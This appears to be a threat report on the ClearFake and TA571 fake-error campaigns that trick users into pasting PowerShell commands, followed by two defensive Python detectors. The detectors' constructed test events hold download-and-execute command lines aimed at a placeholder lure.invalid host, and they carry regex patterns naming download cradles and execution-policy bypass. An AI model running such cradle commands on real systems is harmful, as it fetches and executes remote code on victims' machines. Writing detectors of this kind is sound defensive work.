Attackers are using a social engineering technique that tricks users into running malicious PowerShell scripts themselves: a fake error message tells the victim that the "fix" is to copy a script and paste it into PowerShell or the Run dialog, and doing so infects the system with DarkGate, information stealers, or other malware.
The technique, observed since March 2024, is delivered through both malspam (HTML attachments) and compromised websites, each presenting the script to the victim in a popup-style overlay.
In the ClearFake campaign, attackers compromised legitimate websites and injected a script that used EtherHiding (retrieving the next stage from a blockchain smart contract) to load a second script gated by the Keitaro traffic distribution system (TDS). Visitors who passed the TDS checks were shown a fake warning overlay instructing them to copy and run a PowerShell script.
That first script flushed the DNS cache, downloaded a further script, and checked the system temperature, a check that serves as virtual-machine detection (many VMs and sandboxes report no temperature sensor). If the check passed, it downloaded an AES-encrypted PowerShell script that retrieved a data.zip archive.
The archive contained a legitimate executable that side-loaded a trojanized DLL; that DLL used DOILoader to launch Lumma Stealer, which in turn fetched further payloads: Amadey Loader, a downloader for a cryptocurrency miner, a clipboard hijacker, and possibly JaskaGO.
In April 2024, Proofpoint researchers found compromised websites loading an iframe from pley[.]es that displayed a fake error message and prompted visitors to run a PowerShell script which would have downloaded Vidar Stealer. The payload domain was taken down shortly afterwards, so that first wave no longer delivered anything.
Days later, the iframe content was replaced with a ClearFake injection, which was still active as of June 2024. It is unclear whether these were two separate intrusions or whether the ClearFake actor took over the compromised inject.
TA571 Campaign:
TA571, a high-volume spam distributor, sent email campaigns with HTML attachments that imitated Microsoft Word or OneDrive documents and displayed a fake error message, prompting users to click a “How to Fix” or “Auto-Fix” button.
Clicking the button copied a malicious PowerShell command to the clipboard and showed instructions to paste it into a PowerShell terminal or the Run dialog; executing it downloaded and installed Matanbuchus, DarkGate, or NetSupport RAT.
To evade detection, TA571 rotates its lures regularly and uses tricks such as padding attachments with filler, a common way to push files past the size thresholds at which gateway scanners and sandboxes stop inspecting them.
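How a mail gateway or an incident responder could spot this kind of attachment, as an added example that is not part of the original report or of either campaign's code: the scanner below looks for the combination the text describes, a clipboard-write call plus a string that (directly or after base64 decoding) looks like a PowerShell or CMD command, together with lure text telling the user to press Win+R or Ctrl+V. The HTML it scans is a constructed sample with a harmless placeholder command; the base64 encoding is an assumption for illustration, since the report only says the commands are encoded in various ways.

```python
import base64
import re

# Constructed sample lure for testing (not a real TA571 attachment). It mimics the
# pattern described above: a fake "failed to load" error and a How to Fix button
# whose click handler copies a command to the clipboard. The command is a harmless
# placeholder, and it is base64-encoded in the page (an assumed encoding; the real
# lures use several) so that a plain-text search for "powershell" would miss it.
_PLACEHOLDER_CMD = 'powershell -w hidden -c "Write-Host demo"'
SAMPLE_HTML = """
<html><body>
<div class="err">The document failed to load. Click the button below to fix it.</div>
<button onclick="fix()">How to Fix</button>
<script>
  var p = "%s";
  function fix() {
    navigator.clipboard.writeText(atob(p));
    alert("Press Win+R, then CTRL+V, then press Enter");
  }
</script>
</body></html>
""" % base64.b64encode(_PLACEHOLDER_CMD.encode()).decode()

# Browser APIs that write the clipboard from page script.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|document\.execCommand\(\s*['\"]copy['\"]", re.I)
# Instructions that only make sense if the user is meant to paste into Run or a shell.
RUN_LURE = re.compile(r"win\s*\+\s*r|run dialog|ctrl\s*\+\s*v|powershell (terminal|window)", re.I)
# Tokens that mark a string as a PowerShell/CMD command rather than ordinary page text.
CMD_INDICATORS = re.compile(
    r"powershell|pwsh|\bcmd(\.exe)?\b|mshta|-enc\w*|\biex\b|invoke-expression|"
    r"downloadstring|-w(indowstyle)?\s+hidden|frombase64string", re.I)
# Simple single-line string-literal tokenizer (good enough for a gateway heuristic).
STRING_LITERAL = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1""")
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_candidates(literal: str):
    """Yield the literal itself and, when it is plausible base64, its decoded form."""
    yield literal
    if len(literal) >= 16 and len(literal) % 4 == 0 and B64_CHARS.match(literal):
        try:
            yield base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            return


def scan_html(html: str) -> dict:
    """Flag HTML that writes something resembling a shell command to the clipboard."""
    payloads = []
    for m in STRING_LITERAL.finditer(html):
        for text in decode_candidates(m.group(2)):
            if CMD_INDICATORS.search(text):
                payloads.append(text)
                break
    clipboard_write = bool(CLIPBOARD_WRITE.search(html))
    run_lure = bool(RUN_LURE.search(html))
    return {
        "clipboard_write": clipboard_write,
        "run_dialog_lure": run_lure,
        "payloads": payloads,
        # A clipboard write of command-like text is the core signal; lure text corroborates.
        "suspicious": clipboard_write and bool(payloads),
    }


if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
```

Because the verdict keys off the combination of a clipboard write and command-like content, ordinary pages that copy a link or a coupon code to the clipboard are not flagged. Padding the attachment does not help the attacker here as long as the scanner reads the whole file rather than stopping at a size limit.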
Both TA571 and ClearFake use JavaScript running in the victim's browser, embedded in an HTML attachment or injected into a website, to place a PowerShell or CMD command on the clipboard; the command is stored in the page in various encodings so that it does not appear as plain text.
The technique can slip past antivirus and EDR because no malicious file is written to disk and no exploit is involved: the victim pastes the command into a legitimate interpreter and runs it. TA571's lures point to the PowerShell terminal, where the pasted script runs with a single keystroke, while ClearFake relies on the Run dialog, which shows the pasted command and may give the user a moment to notice that it is not a fix. The execution itself still leaves traces for defenders who collect the right telemetry: PowerShell script block logging (Event ID 4104) records what was pasted, and process-creation events show explorer.exe, which hosts the Run dialog, spawning powershell.exe with a download command on its command line.
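The telemetry side, as an added example that is not code from Proofpoint or from either campaign: a small triage routine over constructed process-creation and script-block events. It flags an interpreter spawned by explorer.exe (the parent of anything launched from the Run dialog), decodes -EncodedCommand arguments (base64 of UTF-16LE text, which is what PowerShell expects) before scanning them, and counts download-cradle and hidden-window indicators, so it catches both the Run-dialog path and the paste-into-terminal path. The event records, the hostnames under the reserved .invalid domain, and the threshold of three indicators are assumptions made up for the example.

```python
import base64
import re
from typing import Optional


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (made up for this example, not real captures).
# "process" events carry the parent/image/command-line fields of a Sysmon Event ID 1
# or Windows 4688 record; "scriptblock" events carry the text of PowerShell Event ID 4104.
EVENTS = [
    # Pasted into the Run dialog: explorer.exe launches it, window hidden, download cradle.
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm http://lure.invalid/a.txt)"'},
    # Same thing with the cradle hidden behind -EncodedCommand.
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc "
                + encode_for_powershell("iex (irm http://lure.invalid/b.txt)")},
    # Pasted into an already-open PowerShell terminal: no new process is created,
    # so only script block logging sees the command.
    {"kind": "scriptblock",
     "text": "(New-Object Net.WebClient).DownloadString('http://lure.invalid/c.ps1') | iex"},
    # Benign administration: a scheduled task running a script via cmd.exe.
    {"kind": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
]

INTERPRETERS = re.compile(r"\\(powershell|pwsh|cmd|mshta)\.exe$", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b",
        re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: dict) -> dict:
    """Score one event for the copy-paste-and-run pattern; three or more hits is suspicious."""
    hits = []
    if event["kind"] == "process":
        text = event["cmdline"]
        # The Run dialog is hosted by explorer.exe, so explorer.exe is the parent of whatever was pasted there.
        if re.search(r"\\explorer\.exe$", event["parent"], re.I) and INTERPRETERS.search(event["image"]):
            hits.append("explorer_spawned_interpreter")
        decoded = decode_encoded_command(text)
        if decoded is not None:
            hits.append("encoded_command")
            text = text + " " + decoded  # scan the decoded script as well
    else:
        text = event["text"]
    hits += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"hits": hits, "suspicious": len(hits) >= 3}  # threshold is an assumption


def triage(events) -> list:
    """Indices of the events an analyst should look at."""
    return [i for i, e in enumerate(events) if analyse(e)["suspicious"]]


if __name__ == "__main__":
    for i in triage(EVENTS):
        print(i, analyse(EVENTS[i])["hits"])
```

The explorer.exe parent on its own is weak (it is also the parent of a PowerShell window opened from the Start menu), which is why it is only one indicator among several; the decoded -EncodedCommand text matters because the base64 form carries none of the cradle keywords. Forensically, commands typed into the Run dialog are also retained in the user's RunMRU registry key, a useful place to confirm what the victim actually pasted.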